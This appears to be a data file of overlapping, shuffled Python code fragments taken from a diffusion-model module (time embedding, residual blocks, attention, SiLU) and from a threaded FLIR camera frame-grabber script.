norm_cfg=dict(type='GN',", "operation. Defaults to True. \"\"\" def __init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False),", "to Two level embedding. First embedding time by an embedding function, then feed", "batch element. dim (int): The dimension of the embedding. max_period (int, optional): Controls", "channels of the input feature map to be downsampled. with_conv (bool, optional): Whether", "will equal to the `in_channels`. Defaults to `None`. norm_cfg (dict, optional): The config", "for `shortcut_kernel_size`, but ' f'receive {shortcut_kernel_size}.') self.learnable_shortcut = out_channels != in_channels if self.learnable_shortcut:", "< '1.6.0': return x * torch.sigmoid(x) return F.silu(x, inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An", "= inplace def forward(self, x): \"\"\"Forward function for SiLU. Args: x (torch.Tensor): Input", "0) @MODULES.register_module() class TimeEmbedding(nn.Module): \"\"\"Time embedding layer, reference to Two level embedding. First", "shared label embedding. Returns: torch.Tensor : Output feature map tensor. \"\"\" embedding =", "_, self.norm = build_norm_layer(norm_cfg, in_channels) self.qkv = nn.Conv1d(in_channels, in_channels * 3, 1) self.proj", "1) else: self.downsample = nn.AvgPool2d(stride=2) def forward(self, x): \"\"\"Forward function for downsampling operation.", "with_conv=True): super().__init__() if with_conv: self.with_conv = True self.conv = nn.Conv2d(in_channels, in_channels, 3, 1,", "that support it as an extra input. Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def forward(self,", "return embedding def forward(self, t): \"\"\"Forward function for time embedding layer. Args: t", "to `out_channels`, a learnable shortcut with conv layers will be added. Args: in_channels", "/ np.sqrt(np.sqrt(channel)) weight = torch.einsum('bct,bcs->bts', q * scale, k * scale) weight =", "Args: in_channels (int): Number of channels of the input feature map to be", "v) return weight def forward(self, x): \"\"\"Forward function for multi head attention. Args:", "ported from here, but adapted to the N-d case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa Args:", "to `None`. norm_cfg (dict, optional): The config for the normalization layers. Defaults too", "' f'but receive {embedding_mode}.') @staticmethod def sinusodial_embedding(timesteps, dim, max_period=10000): \"\"\"Create sinusoidal timestep embeddings.", "if torch.__version__ < '1.6.0': return x * torch.sigmoid(x) return F.silu(x, inplace=self.inplace) @MODULES.register_module() class", "out_channels != in_channels if self.learnable_shortcut: shortcut_padding = 1 if shortcut_kernel_size == 3 else", "and `3` for `shortcut_kernel_size`, but ' f'receive {shortcut_kernel_size}.') self.learnable_shortcut = out_channels != in_channels", "= nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def forward(self, x, y): \"\"\"Forward function. Args: x", "not None: embedding_cfg_.update(embedding_cfg) if embedding_mode.upper() == 'SIN': self.embedding_fn = partial(self.sinusodial_embedding, **embedding_cfg_) else: raise", "layers. Defaults too ``dict(type='GN', num_groups=32)``. act_cfg (dict, optional): The config for the activation", "average pooling and convolution for downsample operation. Args: in_channels (int): Number of channels", "= layer(x) return x @ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r\"\"\"Applies the Sigmoid Linear Unit (SiLU)", "to embedding. 1-D tensor shape as ``[bz, ]``, one per batch element. dim", "to ``dict(type='SiLU', inplace=False)``. \"\"\" def __init__(self, in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__()", "size for the shortcut conv. Defaults to ``1``. \"\"\" def __init__(self, in_channels, embedding_channels,", "of normalization layer. Args: in_channels (int): Number of channels of the input feature", "DenoisingDownsample(nn.Module): \"\"\"Downsampling operation used in the denoising network. Support average pooling and convolution", "if with_conv: self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2, 1) else: self.downsample = nn.AvgPool2d(stride=2)", "for the activation layer. Defaults to `dict(type='SiLU', inplace=False)`. use_scale_shift (bool): If True, the", "for upsampling operation. Args: x (torch.Tensor): Feature map to upsample. Returns: torch.Tensor: Feature", "(dict, optional): Config for time embedding. Defaults to None. act_cfg (dict, optional): Config", "Feature map after downsampling. \"\"\" return self.downsample(x) @MODULES.register_module() class DenoisingUpsample(nn.Module): \"\"\"Upsampling operation used", "EmbedSequential(nn.Sequential): \"\"\"A sequential module that passes timestep embeddings to the children that support", "x, y): for layer in self: if isinstance(layer, DenoisingResBlock): x = layer(x, y)", "layer(x) return x @ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r\"\"\"Applies the Sigmoid Linear Unit (SiLU) function,", "will be added. Args: in_channels (int): Number of channels of the input feature", "downsampled. with_conv (bool, optional): Whether use convolution operation for downsampling. Defaults to `True`.", "shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def forward_shortcut(self, x): if self.learnable_shortcut: return self.shortcut(x) return x def", "will be split to 'scale' and 'shift' and map the output of normalization", "if shortcut_kernel_size == 3 else 0 self.shortcut = nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding)", "self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1) def forward(self, x): \"\"\"Forward function for", "input. Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def forward(self, x, y): for layer in self:", "Config for activation layer. Defaults to ``dict(type='SiLU', inplace=False)``. \"\"\" def __init__(self, in_channels, embedding_channels,", "``dict(type='SiLU', inplace=False)``. \"\"\" def __init__(self, in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks", "(int, optional): Number of output channels of the ResBlock. If not defined, the", "dim (int): The dimension of the embedding. max_period (int, optional): Controls the minimum", "3, padding=1) ] self.conv_2 = nn.Sequential(*conv_2) assert shortcut_kernel_size in [ 1, 3 ],", "the input before normalization operation. Defaults to True. \"\"\" def __init__(self, in_channels, embedding_channels,", "def forward(self, x): \"\"\"Forward function for multi head attention. Args: x (torch.Tensor): Input", "from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def forward(self, x, y): for layer in self: if isinstance(layer,", "of the input feature map to be downsampled. with_conv (bool, optional): Whether apply", "build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def forward(self, x, y): \"\"\"Forward function. Args: x (torch.Tensor): Input", "apply an additional convolution layer after the nearest interpolation operation. Args: in_channels (int):", "weight = torch.einsum('bct,bcs->bts', q * scale, k * scale) weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype)", "Otherwise, embedding results will directly add to input of normalization layer. Args: in_channels", "def __init__(self, in_channels, embedding_channels, use_scale_shift_norm, dropout, out_channels=None, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), shortcut_kernel_size=1): super().__init__()", "timesteps[:, None].float() * freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if dim % 2:", "+ shift else: x = self.norm(x + embedding) return x @MODULES.register_module() class DenoisingDownsample(nn.Module):", "Embedding mode for the time embedding. Defaults to 'sin'. embedding_cfg (dict, optional): Config", "= torch.exp( -np.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32) / half).to(device=timesteps.device) args = timesteps[:, None].float()", "OpenMMLab. All rights reserved. from copy import deepcopy from functools import partial import", "+ scale) + shift else: x = self.norm(x + embedding) return x @MODULES.register_module()", "function. Args: input (bool, optional): Use inplace operation or not. Defaults to `False`.", "embedding. Returns: torch.Tensor : Output feature map tensor. \"\"\" embedding = self.embedding_layer(y)[:, :,", "to be downsampled. with_conv (bool, optional): Whether apply an additional convolution layer after", "= dict(dim=in_channels) if embedding_cfg is not None: embedding_cfg_.update(embedding_cfg) if embedding_mode.upper() == 'SIN': self.embedding_fn", "feature map tensor. y (torch.Tensor): Shared time embedding or shared label embedding. Returns:", "Number of channels of the input feature map. embedding_channels (int) Number of channels", "defined, the output channels will equal to the `in_channels`. Defaults to `None`. norm_cfg", "shortcut_kernel_size == 3 else 0 self.shortcut = nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights()", "activation. \"\"\" if torch.__version__ < '1.6.0': return x * torch.sigmoid(x) return F.silu(x, inplace=self.inplace)", "to the N-d case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa Args: in_channels (int): Channels of the", "output embedding. embedding_mode (str, optional): Embedding mode for the time embedding. Defaults to", "the `in_channels`. Defaults to `None`. norm_cfg (dict, optional): The config for the normalization", "shift else: x = self.norm(x + embedding) return x @MODULES.register_module() class DenoisingDownsample(nn.Module): \"\"\"Downsampling", "num_heads _, self.norm = build_norm_layer(norm_cfg, in_channels) self.qkv = nn.Conv1d(in_channels, in_channels * 3, 1)", "Args: in_channels (int): Number of channels of the input feature map. embedding_channels (int)", "__init__(self, inplace=False): super().__init__() if torch.__version__ < '1.6.0' and inplace: mmcv.print_log('Inplace version of \\'SiLU\\'", "__init__(self, in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks = nn.Sequential( nn.Linear(in_channels, embedding_channels),", "apply zero init to last conv layer constant_init(self.conv_2[-1], 0) @MODULES.register_module() class NormWithEmbedding(nn.Module): \"\"\"Nornalization", "= self.conv_1(x) x = self.norm_with_embedding(x, y) x = self.conv_2(x) return x + shortcut", "the ResBlock. If not defined, the output channels will equal to the `in_channels`.", "map. embedding_channels (int): Number of channels of the input embedding. use_scale_shift_norm (bool): Whether", "noqa Args: in_channels (int): Channels of the input feature map. num_heads (int, optional):", "'1.6.0': return x * torch.sigmoid(x) return F.silu(x, inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An attention", "\"\"\" def __init__(self, in_channels, num_heads=1, norm_cfg=dict(type='GN', num_groups=32)): super().__init__() self.num_heads = num_heads _, self.norm", "def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2,", "layer to ``out * (1 + scale) + shift``. Otherwise, the output of", "1) self.init_weights() @staticmethod def QKVAttention(qkv): channel = qkv.shape[1] // 3 q, k, v", "Feature map to downsample. Returns: torch.Tensor: Feature map after downsampling. \"\"\" return self.downsample(x)", "attention block allows spatial position to attend to each other. Originally ported from", "used to re-shift and re-scale normalization results. Otherwise, embedding results will directly add", "operation. Defaults to `dict(type='GN', num_groups=32)`. act_cfg (dict, optional): Config for the activation layer.", "in_channels, num_heads=1, norm_cfg=dict(type='GN', num_groups=32)): super().__init__() self.num_heads = num_heads _, self.norm = build_norm_layer(norm_cfg, in_channels)", "k, v = torch.chunk(qkv, 3, dim=1) scale = 1 / np.sqrt(np.sqrt(channel)) weight =", "Args: in_channels (int): Number of channels of the input feature map. embedding_channels (int):", "(str, optional): Embedding mode for the time embedding. Defaults to 'sin'. embedding_cfg (dict,", "in_channels (int): Number of channels of the input feature map. embedding_channels (int) Number", "y) x = self.conv_2(x) return x + shortcut def init_weights(self): # apply zero", ": Output feature map tensor. \"\"\" embedding = self.embedding_layer(y)[:, :, None, None] if", "denoising network. If `in_channels` not equals to `out_channels`, a learnable shortcut with conv", "inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An attention block allows spatial position to attend to", "NormWithEmbedding(nn.Module): \"\"\"Nornalization with embedding layer. If `use_scale_shift == True`, embedding results will be", ": Output feature map tensor. \"\"\" shortcut = self.forward_shortcut(x) x = self.conv_1(x) x", "class MultiHeadAttention(nn.Module): \"\"\"An attention block allows spatial position to attend to each other.", "self.norm(x) x = x * (1 + scale) + shift else: x =", "Defaults to None. act_cfg (dict, optional): Config for activation layer. Defaults to ``dict(type='SiLU',", "scale) + shift else: x = self.norm(x + embedding) return x @MODULES.register_module() class", "mmcv.print_log('Inplace version of \\'SiLU\\' is not supported for ' f'torch < 1.6.0, found", "Linear Unit (SiLU) function, element-wise. The SiLU function is also known as the", "= torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct', weight, v) return weight def forward(self, x):", "norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1 = [ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3, padding=1)", "= True self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1) def forward(self, x): \"\"\"Forward", "== 3 else 0 self.shortcut = nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def", "embedding_output = in_channels * 2 if use_scale_shift else in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg),", "https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa Args: in_channels (int): Channels of the input feature map. num_heads", "x (torch.Tensor): Input feature map. Returns: torch.Tensor: Feature map after attention. \"\"\" b,", "f'torch < 1.6.0, found \\'{torch.version}\\'.') self.inplace = inplace def forward(self, x): \"\"\"Forward function", "The config for the activation layers. Defaults to ``dict(type='SiLU', inplace=False)``. shortcut_kernel_size (int, optional):", "= self.norm_with_embedding(x, y) x = self.conv_2(x) return x + shortcut def init_weights(self): #", "layer. Defaults to `dict(type='SiLU', inplace=False)`. use_scale_shift (bool): If True, the output of Embedding", "tensor. y (torch.Tensor): Shared time embedding or shared label embedding. Returns: torch.Tensor :", "norm_cfg (dict, optional): Config for normalization layer. Default to ``dict(type='GN', num_groups=32)`` \"\"\" def", "scale, shift = torch.chunk(embedding, 2, dim=1) x = self.norm(x) x = x *", "nearest interpolation operation. Args: in_channels (int): Number of channels of the input feature", "one per batch element. dim (int): The dimension of the embedding. max_period (int,", "The kernel size for the shortcut conv. Defaults to ``1``. \"\"\" def __init__(self,", "``10000``. Returns: torch.Tensor: Embedding results shape as `[bz, dim]`. \"\"\" half = dim", "Defaults to 'sin'. embedding_cfg (dict, optional): Config for time embedding. Defaults to None.", "act_cfg=dict(type='SiLU', inplace=False), shortcut_kernel_size=1): super().__init__() out_channels = in_channels if out_channels is None else out_channels", "(dict, optional): Config for normalization layer. Default to ``dict(type='GN', num_groups=32)`` \"\"\" def __init__(self,", "] self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg = dict( in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding =", "torch.Tensor : Output feature map tensor. \"\"\" embedding = self.embedding_layer(y)[:, :, None, None]", "max_period=10000): \"\"\"Create sinusoidal timestep embeddings. Args: timesteps (torch.Tensor): Timestep to embedding. 1-D tensor", "(int): Number of channels of the input embedding. use_scale_shift_norm (bool): Whether use scale-shift-norm", "embedding. 1-D tensor shape as ``[bz, ]``, one per batch element. dim (int):", "of the ResBlock. If not defined, the output channels will equal to the", "inplace def forward(self, x): \"\"\"Forward function for SiLU. Args: x (torch.Tensor): Input tensor.", "layer, reference to Two level embedding. First embedding time by an embedding function,", "weight = torch.einsum('bts,bcs->bct', weight, v) return weight def forward(self, x): \"\"\"Forward function for", "of the dropout layers. out_channels (int, optional): Number of output channels of the", "None else out_channels _norm_cfg = deepcopy(norm_cfg) _, norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1 =", "the N-d case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa Args: in_channels (int): Channels of the input", "conv_2 = [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3, padding=1) ] self.conv_2 = nn.Sequential(*conv_2)", "the input embedding. use_scale_shift_norm (bool): Whether use scale-shift-norm in `NormWithEmbedding` layer. dropout (float):", "number of the input feature map. embedding_channels (int): The channel number of the", "1) def forward(self, x): \"\"\"Forward function for upsampling operation. Args: x (torch.Tensor): Feature", "attention. \"\"\" b, c, *spatial = x.shape x = x.reshape(b, c, -1) qkv", "embedding. use_scale_shift_norm (bool): Whether use scale-shift-norm in `NormWithEmbedding` layer. dropout (float): Probability of", "for the normalization layers. Defaults too ``dict(type='GN', num_groups=32)``. act_cfg (dict, optional): The config", "torch.__version__ < '1.6.0': return x * torch.sigmoid(x) return F.silu(x, inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module):", "for downsample operation. Args: in_channels (int): Number of channels of the input feature", "with_conv=True): super().__init__() if with_conv: self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2, 1) else: self.downsample", "extra input. Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def forward(self, x, y): for layer in", "x @ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r\"\"\"Applies the Sigmoid Linear Unit (SiLU) function, element-wise. The", "layer. Default to ``dict(type='GN', num_groups=32)`` \"\"\" def __init__(self, in_channels, num_heads=1, norm_cfg=dict(type='GN', num_groups=32)): super().__init__()", "@ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r\"\"\"Applies the Sigmoid Linear Unit (SiLU) function, element-wise. The SiLU", "feature map. Returns: torch.Tensor: Feature map after attention. \"\"\" b, c, *spatial =", "x = self.norm_with_embedding(x, y) x = self.conv_2(x) return x + shortcut def init_weights(self):", "self.inplace = inplace def forward(self, x): \"\"\"Forward function for SiLU. Args: x (torch.Tensor):", "the activation layers. Defaults to ``dict(type='SiLU', inplace=False)``. shortcut_kernel_size (int, optional): The kernel size", "layer after the nearest interpolation operation. Args: in_channels (int): Number of channels of", "input (bool, optional): Use inplace operation or not. Defaults to `False`. \"\"\" def", "dim=-1) return embedding def forward(self, t): \"\"\"Forward function for time embedding layer. Args:", "added with the input before normalization operation. Defaults to True. \"\"\" def __init__(self,", "Returns: torch.Tensor : Output feature map tensor. \"\"\" embedding = self.embedding_layer(y)[:, :, None,", "x = x * (1 + scale) + shift else: x = self.norm(x", "default_args=norm_with_embedding_cfg) conv_2 = [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3, padding=1) ] self.conv_2 =", "if self.learnable_shortcut: return self.shortcut(x) return x def forward(self, x, y): \"\"\"Forward function. Args:", "class SiLU(nn.Module): r\"\"\"Applies the Sigmoid Linear Unit (SiLU) function, element-wise. The SiLU function", "__init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.with_conv = True self.conv = nn.Conv2d(in_channels, in_channels,", "2, 1) else: self.downsample = nn.AvgPool2d(stride=2) def forward(self, x): \"\"\"Forward function for downsampling", "num_groups=32)``. act_cfg (dict, optional): The config for the activation layers. Defaults to ``dict(type='SiLU',", "The config for the normalization layers. Defaults too ``dict(type='GN', num_groups=32)``. act_cfg (dict, optional):", "in_channels, 1) self.init_weights() @staticmethod def QKVAttention(qkv): channel = qkv.shape[1] // 3 q, k,", "@MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An attention block allows spatial position to attend to each", "dimension of the embedding. max_period (int, optional): Controls the minimum frequency of the", "frequency of the embeddings. Defaults to ``10000``. Returns: torch.Tensor: Embedding results shape as", "Defaults to `None`. norm_cfg (dict, optional): The config for the normalization layers. Defaults" ]
[ "jam < 12: # selama jam di antara 5 s.d. 12 print(\"Selamat pagi!\")", "12 print(\"Selamat pagi!\") elif jam >= 12 and jam < 17: # selama", "and jam < 17: # selama jam di antara 12 s.d. 17 #", "5 <= jam < 12: # selama jam di antara 5 s.d. 12", "17 print(\"Selamat siang!\") elif jam >= 17 and jam < 19: # selama", "jam = 13 if 5 <= jam < 12: # selama jam di", "selama jam di antara 5 s.d. 12 print(\"Selamat pagi!\") elif jam >= 12", "# selama jam di antara 5 s.d. 12 print(\"Selamat pagi!\") elif jam >=", "siang!\") elif jam >= 17 and jam < 19: # selama jam di", "di antara 5 s.d. 12 print(\"Selamat pagi!\") elif jam >= 12 and jam", "<= jam < 12: # selama jam di antara 5 s.d. 12 print(\"Selamat", "pagi!\") elif jam >= 12 and jam < 17: # selama jam di", "s.d. 17 # simplified: elif 12 <= jam < 17 print(\"Selamat siang!\") elif", "17: # selama jam di antara 12 s.d. 17 # simplified: elif 12", "# selama jam di antara 17 s.d. 19 print(\"Selamat sore!\") else: # selain", "<= jam < 17 print(\"Selamat siang!\") elif jam >= 17 and jam <", "12 <= jam < 17 print(\"Selamat siang!\") elif jam >= 17 and jam", "5 s.d. 12 print(\"Selamat pagi!\") elif jam >= 12 and jam < 17:", "elif jam >= 17 and jam < 19: # selama jam di antara", "selama jam di antara 17 s.d. 19 print(\"Selamat sore!\") else: # selain kondisi", "simplified: elif 12 <= jam < 17 print(\"Selamat siang!\") elif jam >= 17", "< 17: # selama jam di antara 12 s.d. 17 # simplified: elif", "# simplified: elif 12 <= jam < 17 print(\"Selamat siang!\") elif jam >=", "jam di antara 17 s.d. 19 print(\"Selamat sore!\") else: # selain kondisi di", "12 s.d. 17 # simplified: elif 12 <= jam < 17 print(\"Selamat siang!\")", "17 # simplified: elif 12 <= jam < 17 print(\"Selamat siang!\") elif jam", "jam >= 17 and jam < 19: # selama jam di antara 17", "antara 5 s.d. 12 print(\"Selamat pagi!\") elif jam >= 12 and jam <", "13 if 5 <= jam < 12: # selama jam di antara 5", "jam di antara 5 s.d. 12 print(\"Selamat pagi!\") elif jam >= 12 and", "# selama jam di antara 12 s.d. 17 # simplified: elif 12 <=", "elif 12 <= jam < 17 print(\"Selamat siang!\") elif jam >= 17 and", "jam < 17: # selama jam di antara 12 s.d. 17 # simplified:", "antara 12 s.d. 17 # simplified: elif 12 <= jam < 17 print(\"Selamat", "jam >= 12 and jam < 17: # selama jam di antara 12", "di antara 12 s.d. 17 # simplified: elif 12 <= jam < 17", "elif jam >= 12 and jam < 17: # selama jam di antara", "antara 17 s.d. 19 print(\"Selamat sore!\") else: # selain kondisi di atas print(\"Selamat", "s.d. 12 print(\"Selamat pagi!\") elif jam >= 12 and jam < 17: #", "jam di antara 12 s.d. 17 # simplified: elif 12 <= jam <", "< 19: # selama jam di antara 17 s.d. 19 print(\"Selamat sore!\") else:", "print(\"Selamat pagi!\") elif jam >= 12 and jam < 17: # selama jam", "17 and jam < 19: # selama jam di antara 17 s.d. 19", "jam < 17 print(\"Selamat siang!\") elif jam >= 17 and jam < 19:", "= 13 if 5 <= jam < 12: # selama jam di antara", "if 5 <= jam < 12: # selama jam di antara 5 s.d.", "print(\"Selamat siang!\") elif jam >= 17 and jam < 19: # selama jam", ">= 12 and jam < 17: # selama jam di antara 12 s.d.", "< 12: # selama jam di antara 5 s.d. 12 print(\"Selamat pagi!\") elif", "and jam < 19: # selama jam di antara 17 s.d. 19 print(\"Selamat", "di antara 17 s.d. 19 print(\"Selamat sore!\") else: # selain kondisi di atas", "19: # selama jam di antara 17 s.d. 19 print(\"Selamat sore!\") else: #", "12 and jam < 17: # selama jam di antara 12 s.d. 17", "selama jam di antara 12 s.d. 17 # simplified: elif 12 <= jam", "< 17 print(\"Selamat siang!\") elif jam >= 17 and jam < 19: #", "jam < 19: # selama jam di antara 17 s.d. 19 print(\"Selamat sore!\")", ">= 17 and jam < 19: # selama jam di antara 17 s.d.", "17 s.d. 19 print(\"Selamat sore!\") else: # selain kondisi di atas print(\"Selamat malam!\")", "12: # selama jam di antara 5 s.d. 12 print(\"Selamat pagi!\") elif jam" ]
[ "= [] for i in range(num_threads): worker = FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,),", "for thread in self._threads: thread.join() del self._threads if (self._latest_camera_frame is not None): self._latest_camera_frame", "self._threads = [] for i in range(num_threads): worker = FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame,", "FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread) def stop(self): if (self._is_running is", "def get_fps(self): return self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame = frame now = time.time()", "= None _last_frame_grab_time = 0 _frame_grab_fps = 0 def is_running(self): return self._is_running def", "now - self._last_frame_grab_time self._frame_grab_fps = .99 * self._frame_grab_fps + .01 * (1.0 /", "class FrameGrabWorker: def __init__(self, index): self._index = index self._lock = threading.Lock() def get_camera_frame(self,", "__init__(self, serial=None): if serial is None: raise Exception(\"Please provide a valid FLIR camera", "get_fps(self): return self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame = frame now = time.time() duration", "def is_running(self): return self._is_running def get_camera(self): return self._camera def get_dimensions(self): return (self._camera_width, self._camera_height)", "self._frame_grab_fps + .01 * (1.0 / duration) self._last_frame_grab_time = now def get_latest_frame(self): return", "self._latest_camera_frame = None class FrameGrabWorker: def __init__(self, index): self._index = index self._lock =", "return self._camera def get_dimensions(self): return (self._camera_width, self._camera_height) def get_fps(self): return self._frame_grab_fps def set_latest_frame(self,", "self._is_running = True self._threads = [] for i in range(num_threads): worker = FrameGrabWorker(i)", "= False def deinit(self): self.stop() if (self._is_camera_inited is True): self._is_camera_inited = False self._camera.EndAcquisition()", "self._threads.append(thread) def stop(self): if (self._is_running is True): self._is_running = False for thread in", "self._is_running = False def deinit(self): self.stop() if (self._is_camera_inited is True): self._is_camera_inited = False", "cv2 class FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame = None _last_frame_grab_time = 0 _frame_grab_fps", "def get_camera_frame(self, target): while target.is_running(): with self._lock: frame = target.get_camera().GetNextImage() width, height =", "= self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running = False def deinit(self): self.stop()", "self._camera.EndAcquisition() self._camera.DeInit() del self._camera del self._camera_width del self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del", "self._camera.DeInit() del self._camera del self._camera_width del self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del self._system", "get_dimensions(self): return (self._camera_width, self._camera_height) def get_fps(self): return self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame =", "self._camera_list self._system.ReleaseInstance() del self._system del self._serial def start(self, num_threads = 1): if (self._is_running", "args=(self,), daemon=False) thread.start() self._threads.append(thread) def stop(self): if (self._is_running is True): self._is_running = False", "frame now = time.time() duration = now - self._last_frame_grab_time self._frame_grab_fps = .99 *", "threading.Lock() def get_camera_frame(self, target): while target.is_running(): with self._lock: frame = target.get_camera().GetNextImage() width, height", "set_latest_frame(self, frame): self._latest_camera_frame = frame now = time.time() duration = now - self._last_frame_grab_time", "a valid FLIR camera serial number\") self._serial = serial; self._system = PySpin.System.GetInstance() self._camera_list", "del self._system del self._serial def start(self, num_threads = 1): if (self._is_running is not", "camera serial number\") self._serial = serial; self._system = PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera", "range(num_threads): worker = FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread) def stop(self):", "self._is_running def get_camera(self): return self._camera def get_dimensions(self): return (self._camera_width, self._camera_height) def get_fps(self): return", "def deinit(self): self.stop() if (self._is_camera_inited is True): self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit() del", "= frame now = time.time() duration = now - self._last_frame_grab_time self._frame_grab_fps = .99", "self._camera_width del self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del self._system del self._serial def start(self,", "valid FLIR camera serial number\") self._serial = serial; self._system = PySpin.System.GetInstance() self._camera_list =", ".01 * (1.0 / duration) self._last_frame_grab_time = now def get_latest_frame(self): return self._latest_camera_frame is", "del self._serial def start(self, num_threads = 1): if (self._is_running is not True): self._is_running", "del self._camera_list self._system.ReleaseInstance() del self._system del self._serial def start(self, num_threads = 1): if", "(self._is_running is not True): self._is_running = True self._threads = [] for i in", "None class FrameGrabWorker: def __init__(self, index): self._index = index self._lock = threading.Lock() def", "class FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame = None _last_frame_grab_time = 0 _frame_grab_fps =", "target): while target.is_running(): with self._lock: frame = target.get_camera().GetNextImage() width, height = target.get_dimensions() img", "0 def is_running(self): return self._is_running def get_camera(self): return self._camera def get_dimensions(self): return (self._camera_width,", "get_camera_frame(self, target): while target.is_running(): with self._lock: frame = target.get_camera().GetNextImage() width, height = target.get_dimensions()", "self._frame_grab_fps = .99 * self._frame_grab_fps + .01 * (1.0 / duration) self._last_frame_grab_time =", "self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit() del self._camera del self._camera_width del self._camera_height self._camera_list.Clear() del", "* self._frame_grab_fps + .01 * (1.0 / duration) self._last_frame_grab_time = now def get_latest_frame(self):", "self._latest_camera_frame def __init__(self, serial=None): if serial is None: raise Exception(\"Please provide a valid", "(self._latest_camera_frame is not None): self._latest_camera_frame = None class FrameGrabWorker: def __init__(self, index): self._index", "while target.is_running(): with self._lock: frame = target.get_camera().GetNextImage() width, height = target.get_dimensions() img =", "self._last_frame_grab_time = now def get_latest_frame(self): return self._latest_camera_frame is not None, self._latest_camera_frame def __init__(self,", "= now def get_latest_frame(self): return self._latest_camera_frame is not None, self._latest_camera_frame def __init__(self, serial=None):", "= 0 def is_running(self): return self._is_running def get_camera(self): return self._camera def get_dimensions(self): return", "threading import time import cv2 class FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame = None", "import threading import time import cv2 class FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame =", "FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame = None _last_frame_grab_time = 0 _frame_grab_fps = 0", "def start(self, num_threads = 1): if (self._is_running is not True): self._is_running = True", "self._camera_width = self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running 